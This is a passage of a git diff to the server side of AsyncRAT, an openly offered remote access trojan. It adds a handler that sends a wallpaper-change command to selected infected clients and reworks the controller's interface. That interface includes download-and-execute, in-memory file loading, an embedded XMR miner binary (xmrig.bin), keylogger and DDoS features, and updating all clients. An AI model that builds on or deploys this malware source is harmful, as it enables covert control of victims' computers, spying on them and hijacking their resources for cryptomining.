- this.downloadAndExecuteToolStripMenuItem.Click += new System.EventHandler(this.DownloadAndExecuteToolStripMenuItem_Click);
- //
- // sENDFILETOMEMORYToolStripMenuItem1
- //
- this.sENDFILETOMEMORYToolStripMenuItem1.Name = "sENDFILETOMEMORYToolStripMenuItem1";
- this.sENDFILETOMEMORYToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.sENDFILETOMEMORYToolStripMenuItem1.Text = "SEND FILE TO MEMORY";
- this.sENDFILETOMEMORYToolStripMenuItem1.Click += new System.EventHandler(this.SENDFILETOMEMORYToolStripMenuItem1_Click);
- //
- // minerToolStripMenuItem1
- //
- this.minerToolStripMenuItem1.Name = "minerToolStripMenuItem1";
- this.minerToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.minerToolStripMenuItem1.Text = "XMR MINER";
- this.minerToolStripMenuItem1.Click += new System.EventHandler(this.MinerToolStripMenuItem1_Click);
- //
- // uPDATEToolStripMenuItem1
- //
- this.uPDATEToolStripMenuItem1.Name = "uPDATEToolStripMenuItem1";
- this.uPDATEToolStripMenuItem1.Size = new System.Drawing.Size(249, 32);
- this.uPDATEToolStripMenuItem1.Text = "UPDATE ALL CLIENTS";
- this.uPDATEToolStripMenuItem1.Click += new System.EventHandler(this.UPDATEToolStripMenuItem1_Click);
- //
- // toolStripSeparator4
- //
- this.toolStripSeparator4.Name = "toolStripSeparator4";
- this.toolStripSeparator4.Size = new System.Drawing.Size(246, 6);
- //
- // dELETETASKToolStripMenuItem
- //
- this.dELETETASKToolStripMenuItem.Name = "dELETETASKToolStripMenuItem";
- this.dELETETASKToolStripMenuItem.Size = new System.Drawing.Size(249, 32);
- this.dELETETASKToolStripMenuItem.Text = "DELETE TASK";
- this.dELETETASKToolStripMenuItem.Click += new System.EventHandler(this.DELETETASKToolStripMenuItem_Click);
- //
- // performanceCounter1
- //
- this.performanceCounter1.CategoryName = "Processor";
- this.performanceCounter1.CounterName = "% Processor Time";
- this.performanceCounter1.InstanceName = "_Total";
- //
- // performanceCounter2
- //
- this.performanceCounter2.CategoryName = "Memory";
- this.performanceCounter2.CounterName = "% Committed Bytes In Use";
- //
- // notifyIcon1
- //
- this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
- this.notifyIcon1.Text = "AsyncRAT";
- this.notifyIcon1.Visible = true;
- //
- // TimerTask
- //
- this.TimerTask.Enabled = true;
- this.TimerTask.Interval = 5000;
- this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
- //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -1027,7 +1039,7 @@
private System.Windows.Forms.ColumnHeader columnHeader2;
private System.Diagnostics.PerformanceCounter performanceCounter1;
private System.Diagnostics.PerformanceCounter performanceCounter2;
- public System.Windows.Forms.ColumnHeader lv_prefor;
+ public System.Windows.Forms.ColumnHeader lv_act;
private System.Windows.Forms.ToolStripMenuItem aBOUTToolStripMenuItem;
private System.Windows.Forms.TabPage tabPage3;
private System.Windows.Forms.ContextMenuStrip contextMenuThumbnail;
@@ -1103,6 +1115,7 @@
private System.Windows.Forms.ToolStripMenuItem minerToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem runToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem stopToolStripMenuItem1;
+ private System.Windows.Forms.ToolStripMenuItem setWallpaperToolStripMenuItem;
}
}
diff --git a/AsyncRAT-C#/Server/Forms/Form1.cs b/AsyncRAT-C#/Server/Forms/Form1.cs
index 205d6ed..4988db6 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.cs
+++ b/AsyncRAT-C#/Server/Forms/Form1.cs
@@ -1062,6 +1062,42 @@ namespace Server
}
}
+ private void setWallpaperToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ if (listView1.SelectedItems.Count > 0)
+ {
+ using (OpenFileDialog openFileDialog = new OpenFileDialog())
+ {
+ openFileDialog.Filter = "All Graphics Types|*.bmp;*.jpg;*.jpeg;*.png";
+ if (openFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "wallpaper";
+ packet.ForcePathObject("Image").SetAsBytes(File.ReadAllBytes(openFileDialog.FileName));
+ packet.ForcePathObject("Exe").AsString = Path.GetExtension(openFileDialog.FileName);
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+ foreach (Clients client in GetSelectedClients())
+ {
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
+ }
+ }
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
+ }
+
#endregion
#region System Client
@@ -1708,6 +1744,5 @@ namespace Server
[DllImport("uxtheme", CharSet = CharSet.Unicode)]
public static extern int SetWindowTheme(IntPtr hWnd, string textSubAppName, string textSubIdList);
-
}
}
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
index 74e44fb..7e90532 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
@@ -78,14 +78,7 @@ namespace Server.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString);
client.LV.SubItems.Add("0000 MS");
- try
- {
- client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online"));
- }
- catch
- {
- client.LV.SubItems.Add("??");
- }
+ client.LV.SubItems.Add("...");
client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine;
client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
index 14fd45f..fa5e7f7 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
@@ -18,7 +18,7 @@ namespace Server.Handle_Packet
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
lock (Settings.LockListviewClients)
if (client.LV != null)
- client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString.Replace("MINER 0", "MINER Offline").Replace("MINER 1", "MINER Online");
+ client.LV.SubItems[Program.form1.lv_act.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
else
Debug.WriteLine("Temp socket pinged server");
}
diff --git a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
index 409e7b1..ff4cb87 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
+++ b/AsyncRAT-C#/Server/Properties/Resources.Designer.cs
@@ -200,6 +200,16 @@ namespace Server.Properties {
}
}
+ ///
+ /// Looks up a localized resource of type System.Drawing.Bitmap.
+ ///
+ internal static System.Drawing.Bitmap iconfinder_32_171485__1_ {
+ get {
+ object obj = ResourceManager.GetObject("iconfinder_32_171485 (1)", resourceCulture);
+ return ((System.Drawing.Bitmap)(obj));
+ }
+ }
+
///
/// Looks up a localized resource of type System.Drawing.Bitmap.
///
diff --git a/AsyncRAT-C#/Server/Properties/Resources.resx b/AsyncRAT-C#/Server/Properties/Resources.resx
index 3e3f7b4..81b3dd4 100644
--- a/AsyncRAT-C#/Server/Properties/Resources.resx
+++ b/AsyncRAT-C#/Server/Properties/Resources.resx
@@ -181,9 +181,6 @@
..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
..\Resources\pc.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -193,6 +190,9 @@
..\Resources\info.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\Miscellaneous.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -202,6 +202,9 @@
..\Resources\xmr.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\msgbox.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -211,8 +214,8 @@
..\Resources\extra.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
..\Resources\monitoring-system.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -220,14 +223,17 @@
..\Resources\webcam.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
..\Resources\tomem.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\netstat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\process.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
@@ -244,16 +250,13 @@
..\Resources\chat.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
- ..\Resources\xmrig.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+ ..\Resources\client.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
..\Resources\7z.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
-
- ..\Resources\keyboard.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
-
-
- ..\Resources\keyboard-on.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\iconfinder_32_171485 (1).png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png b/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png
new file mode 100644
index 0000000..f7fac9b
Binary files /dev/null and b/AsyncRAT-C#/Server/Resources/iconfinder_32_171485 (1).png differ
diff --git a/AsyncRAT-C#/Server/Server.csproj b/AsyncRAT-C#/Server/Server.csproj
index 8d8b037..4347508 100644
--- a/AsyncRAT-C#/Server/Server.csproj
+++ b/AsyncRAT-C#/Server/Server.csproj
@@ -350,6 +350,7 @@
+